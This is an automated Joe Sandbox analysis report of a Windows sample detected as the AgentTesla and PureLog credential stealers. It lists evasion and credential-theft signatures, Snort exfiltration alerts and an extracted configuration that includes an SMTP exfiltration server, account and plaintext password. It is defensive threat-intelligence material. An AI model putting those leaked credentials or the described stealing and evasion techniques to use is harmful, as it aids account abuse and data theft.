Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
Analysis ID:1431452
MD5:946a0735432aca25fa370970e97a3dbb
SHA1:9ffac6be378c7379a8ea11a5a439445a46f6bb5c
SHA256:7628ace4f2627bc65377a8123ce9e05849e4e4b3fd5b862e03ffcee42274ccfb
Tags:exe
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Allocates memory in foreign processes
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe" MD5: 946A0735432ACA25FA370970E97A3DBB)
    • RegSvcs.exe (PID: 7404 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.nationalkham.com", "Username": "sales@nationalkham.com", "Password": "kham1234"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1688397215.0000000005890000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000000.00000002.1686492613.0000000004239000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000002.00000002.4135337637.0000000002BBA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000002.00000002.4135337637.0000000002B95000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000002.00000002.4135337637.0000000002B95000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 7 entries
              SourceRuleDescriptionAuthorStrings
              0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4239970.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4239970.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                        Click to see the 14 entries

                        System Summary

                        barindex
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 192.185.35.67, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7404, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735
                        Timestamp:04/25/24-07:17:01.018869
                        SID:2851779
                        Source Port:49735
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-07:17:01.018819
                        SID:2030171
                        Source Port:49735
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-07:17:01.018869
                        SID:2855542
                        Source Port:49735
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-07:17:01.018869
                        SID:2855245
                        Source Port:49735
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-07:17:01.018869
                        SID:2840032
                        Source Port:49735
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.nationalkham.com", "Username": "sales@nationalkham.com", "Password": "kham1234"}
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeVirustotal: Detection: 25%Perma Link
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeJoe Sandbox ML: detected
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

                        barindex
                        Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49735 -> 192.185.35.67:587
                        Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49735 -> 192.185.35.67:587
                        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49735 -> 192.185.35.67:587
                        Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49735 -> 192.185.35.67:587
                        Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49735 -> 192.185.35.67:587
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, type: UNPACKEDPE
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                        Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: ip-api.com
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: global trafficDNS traffic detected: DNS query: mail.nationalkham.com
                        Source: RegSvcs.exe, 00000002.00000002.4135337637.0000000002B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4135337637.0000000002B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: RegSvcs.exe, 00000002.00000002.4135337637.0000000002BBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.nationalkham.com
                        Source: RegSvcs.exe, 00000002.00000002.4135337637.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688552621.0000000005B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4135337637.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                        Source: RegSvcs.exe, 00000002.00000002.4135337637.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                        Source: RegSvcs.exe, 00000002.00000002.4135337637.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49732 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, cPKWk.cs.Net Code: NikjhBPi

                        System Summary

                        barindex
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_017DE3B40_2_017DE3B4
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_07B508B00_2_07B508B0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_07B537670_2_07B53767
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_07B5C6B80_2_07B5C6B8
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_07B596E00_2_07B596E0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_07B5A6430_2_07B5A643
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_07B5C2800_2_07B5C280
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_07B5A20B0_2_07B5A20B
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_07B5C27B0_2_07B5C27B
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_07B521170_2_07B52117
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_07B521500_2_07B52150
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_07B521410_2_07B52141
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_07B5AA780_2_07B5AA78
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_07B5089F0_2_07B5089F
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_07B538100_2_07B53810
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_07B538000_2_07B53800
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_07C404480_2_07C40448
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00E5E7682_2_00E5E768
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00E54AC82_2_00E54AC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00E53EB02_2_00E53EB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00E541F82_2_00E541F8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_067066D82_2_067066D8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_067033D02_2_067033D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0670B3C02_2_0670B3C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06700A0A2_2_06700A0A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0670E8682_2_0670E868
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_067088102_2_06708810
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06708F132_2_06708F13
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0670ACE02_2_0670ACE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_067059E02_2_067059E0
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000000.1666331530.0000000000E72000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEQm.exe" vs SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename04270d52-09be-426d-981e-ac7270cab5c5.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1690478704.000000000A300000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1685590184.00000000034C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename04270d52-09be-426d-981e-ac7270cab5c5.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1684363655.000000000143E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeBinary or memory string: OriginalFilenameEQm.exe" vs SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, 6oQOw74dfIt.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, aMIWm.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, KwnJ9o9hiIrcHUfDCG.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, KwnJ9o9hiIrcHUfDCG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, KwnJ9o9hiIrcHUfDCG.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, KwnJ9o9hiIrcHUfDCG.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, KwnJ9o9hiIrcHUfDCG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, KwnJ9o9hiIrcHUfDCG.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, iaBx0C70ImTHXMC3jW.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, iaBx0C70ImTHXMC3jW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
